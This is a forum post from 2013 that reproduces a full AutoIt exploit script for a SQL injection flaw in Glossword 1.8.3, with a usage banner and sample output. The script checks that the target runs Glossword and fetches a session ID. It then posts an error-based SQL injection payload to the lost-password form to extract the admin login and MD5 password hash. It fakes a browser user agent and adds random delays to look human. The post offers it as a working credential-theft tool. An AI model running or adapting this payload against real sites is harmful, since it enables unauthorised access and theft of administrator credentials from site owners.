Praetorian503 Posted February 5, 2013 Report Posted February 5, 2013 Glossword version 1.8.3 remote SQL injection exploit written in AutoIT.#cs==============================================================Vulnerable Software: Glossword 1.8.3Official site: http://sourceforge.net/projects/glossword/Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.3/Vuln: SQLi==================THIS IS A WHOLE EXPLOIT=====================Exploit Coded In AutoIT.To exploit this vulnerability magic_quotes_gpc must be turned off on server side.Print screen: http://s004.radikal.ru/i206/1302/89/d7398ade1cd7.pngPOC video: http://youtu.be/55IaNTQS3FkExploit usage:C:\0day>glossa.exe http://hacker1.own /glossword/glossword/ 2############################################################### Glossword 1.8.3 SQL injection Exploit ## Usage: glossa.exe http://site.tld /installdir/ UID (int) ## DON'T HATE THE HACKER, HATE YOUR OWN CODE! ## VULN/Exploit: AkaStep & HERO_AZE #############################################################################################################################[*] SENDING FAKE SESSUID: ea0f5d8c7c2c8a2f9f7c3b3e5a3d4f5d [*]############################################################################################################################[*] CMS is GLOSSWORD! [*]############################################################################################################################[*] FETCHING VALID SESSUID [*]############################################################################################################################[*] Got VALID SESSUID: aa0e680bef2679932393abe72b78ef03 [*]############################################################################################################################[*] !~ P*W*N*E*D ~! [*]--------------------------------------------------------------[*] Login: admin [*]--------------------------------------------------------------[*] Password: (MD5) 260efaff0cac0f78a53ccc540e89e72d [*]--------------------------------------------------------------Admin Panel: hacker1.own/glossword/glossword/gw_admin/login.php--------------------------------------------------------------[*] Good Luck;) [*]##############################################################[*] DONE [*]###############################################################ce#NoTrayIcon#Region ;**** Directives created by AutoIt3Wrapper_GUI ****#AutoIt3Wrapper_Outfile=glossa.exe#AutoIt3Wrapper_UseUpx=n#AutoIt3Wrapper_Change2CUI=y#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****#include "WinHttp.au3"#include <inet.au3>#include <String.au3>$triptrop=@CRLF & _StringRepeat('#',62) & @CRLF;$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _'#' & _StringRepeat(' ',11) & 'Glossword 1.8.3 SQL injection Exploit ' & _StringRepeat(' ',11) & '#' & @CRLF & _'# Usage: ' & @ScriptName & ' http://site.tld ' & ' /installdir/ ' & ' UID (int) #' & _@CRLF & "# DON'T HATE THE HACKER, HATE YOUR OWN CODE! #" & @CRLF & _'# VULN/Exploit: AkaStep & HERO_AZE #' & @CRLF & _StringRepeat('#',62);ConsoleWrite(@CRLF & $exploitname & @CRLF)$method='POST';$vulnurl='gw_admin/login.php'Global $sessid=0$cmsindent='lossword'; # We will use it to identify CMS #;$adminpanel=$vulnurl;#~ Impersonate that We Are Not BOT or exploit.We are human who uses IE.# ~;$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld ' & ' /installdir/ ' & ' UID (int)' & @CRLFif $CmdLine[0] <> 3 Then ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF); MsgBox(64,"",$msg_usage); exit;EndIfif $CmdLine[0]=3 Then$targetsite=$CmdLine[1];$installdir=$CmdLine[2];$uidtoattack=Number(StringMid($CmdLine[3],1,255));EndIfif not StringIsDigit($uidtoattack) Then ConsoleWrite(' UID is wrong! Exit' ); Exit; EndIfif StringStripWS($targetsite,8)='' OR StringStripWS($installdir,8)='' Then ConsoleWrite('Are you kidding meeeeen?'); Exit;EndIfHttpSetUserAgent($useragent)$doublecheck=InetGet($targetsite,'',1);if @error Then ConsoleWrite('[*] Incorrect Domain Name/Or you are Offline! [*]' & @CRLF) Exit;EndIfsleep(Random(1200,2500,1));sendfakeretrivevalidsess($targetsite,$installdir)HttpSetUserAgent($useragent);$sidentify=_INetGetSource($targetsite & $adminpanel,True);Func exploit($targetsite,$installdir,$sessid)Global $sAddress = $targetsiteGlobal $PAYLOADTOSEND ="arPost[user_name]=') AND (select floor(rand(0)*2) from(select count(*)," & _"concat((select concat(0x3C73696B6469723E,login,0x7c,password,0x3C2F73696B6469723E,0x7c) from " & _"gw_auth where id_auth=" & $uidtoattack & "),floor(rand(0)*2))x from information_schema.tables group by x)a)-- " & _" AND 1=('1&arPost[user_email]=trueownage&a=lostpass&sid=" & $sessid & "&post=Send password";Global $sDomain = $targetsiteGlobal $sPage = $installdir & $vulnurlGlobal $sAdditionalData = $PAYLOADTOSENDGlobal $hOpen = _WinHttpOpen($useragent)Global $hConnect = _WinHttpConnect($hOpen, $sDomain)Global $hRequest = _WinHttpOpenRequest($hConnect, "POST", $sPage, -1, -1, -1, '')_WinHttpSendRequest($hRequest, "Content-Type: application/x-www-form-urlencoded", $sAdditionalData)_WinHttpReceiveResponse($hRequest)Global $sReturnedIf _WinHttpQueryDataAvailable($hRequest) Then Do $sReturned &= _WinHttpReadData($hRequest) Until @error if StringInStr($sReturned,'<sikdir>') and StringInStr($sReturned,'</sikdir>') Then$zsuxxv = StringRegExp($sReturned, '<(?i)sikdir>(.*?)</(?i)sikdir>', 1)For $x = 0 To UBound($zsuxxv) - 1 Beep(100,1000); ConsoleWrite($triptrop & '[*] !~ P*W*N*E*D ~! [*] ' & _ StringReplace($triptrop,'#','-') & '[*] Login: ' & StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1) & _ _StringRepeat(' ',StringLen($triptrop)-18-StringLen(StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1))) & '[*]' & _ StringReplace($triptrop,'#','-') & '[*] Password: (MD5) ' & StringReplace($zsuxxv[$x],StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')),'') & _ ' [*] ' & _ StringReplace($triptrop,'#','-') & _ 'Admin Panel: ' & $targetsite & $installdir &$adminpanel & ' ' & StringReplace($triptrop,'#','-') & _ '[*] Good Luck;) [*]' & _ $triptrop & '[*] DONE [*]' & _ $triptrop);NextElse ConsoleWrite($triptrop & '[*] ' & _StringRepeat(' ',18) & ' NO SUCH UID! ' & _StringRepeat(' ',18) & _ ' [*]' & $triptrop); Beep(1500,1000); Exit EndIfEndIf_WinHttpCloseHandle($hRequest)_WinHttpCloseHandle($hConnect)_WinHttpCloseHandle($hOpen)EndFunc;=> exploit();Func sendfakeretrivevalidsess($targetsite,$installdir)$fakesessionID='';Do$fakesessionID&=Chr(Random(97,102,1)) & Random(0,9,1)until StringLen($fakesessionID)=32$fakesessionID=StringMid($fakesessionID,Random(1,32,1),1) & StringMid($fakesessionID,1,StringLen($fakesessionID)-1)ConsoleWrite($triptrop & '[*] SENDING FAKE SESSUID: ' & $fakesessionID & ' [*] ' & $triptrop)sleep(Random(1000,2500,1))$rtarget=$targetsite & $installdir &"gw_admin/login.php?visualtheme=gw_admin&sid=" &$fakesessionID;HttpSetUserAgent($useragent);$str=_INetGetSource($rtarget);if StringInStr($str,"Session does not exist.") thenConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',18) & 'CMS is GLOSSWORD! ' & _StringRepeat(' ',19) & '[*]' & $triptrop);sleep(Random(1000,2500,1))Else ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',11) &'NOPE:( THIS IS NOT GLOSSWORD CMS.' &_StringRepeat(' ',12) &'[*]' & $triptrop);exit;EndIf$i=123$mystr='';ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',16) & 'FETCHING VALID SESSUID' & _StringRepeat(' ',17) & ' [*]' & $triptrop)sleep(Random(1000,2500,1))Do$i+=1;if $i>=4000 then ExitLoop;//Just for make sure we are not going to infinitive loop if there any error occurs.//$mystr&=StringMid($str,$i,1)until StringInStr($mystr,chr(34));$sessid=StringMid($mystr,StringInStr($mystr,Chr(61))+1,32)if not $sessid =32 Then ConsoleWrite($triptrop & '[*] Sorry Man! Theris an error while fetching new VALID SESSUID [*]' & $triptrop) exit;Else ConsoleWrite($triptrop & '[*] Got VALID SESSUID: ' & $sessid & ' [*]' & $triptrop)EndIf$targetsite=StringReplace(StringReplace($targetsite,'http://',''),'/','')exploit($targetsite,$installdir,$sessid)EndFunc;=>sendfakeretrivevalidsess();#cs================================================ KUDOSSSSSSS================================================packetstormsecurity.orgpacketstormsecurity.compacketstormsecurity.netsecurityfocus.comcxsecurity.comsecurity.nnov.rusecurtiyvulns.comsecuritylab.rusecunia.comsecurityhome.euexploitsdownload.comosvdb.comwebsecurity.com.ua1337day.comitsecuritysolutions.orgto all Aa Team + to all Azerbaijan Black HatZ+ *Especially to my bro CAMOUFL4G3 *To All Turkish HackersAlso special thanks to: ottoman38 & HERO_AZE================================================/AkaStep#ceSource: PacketStorm Quote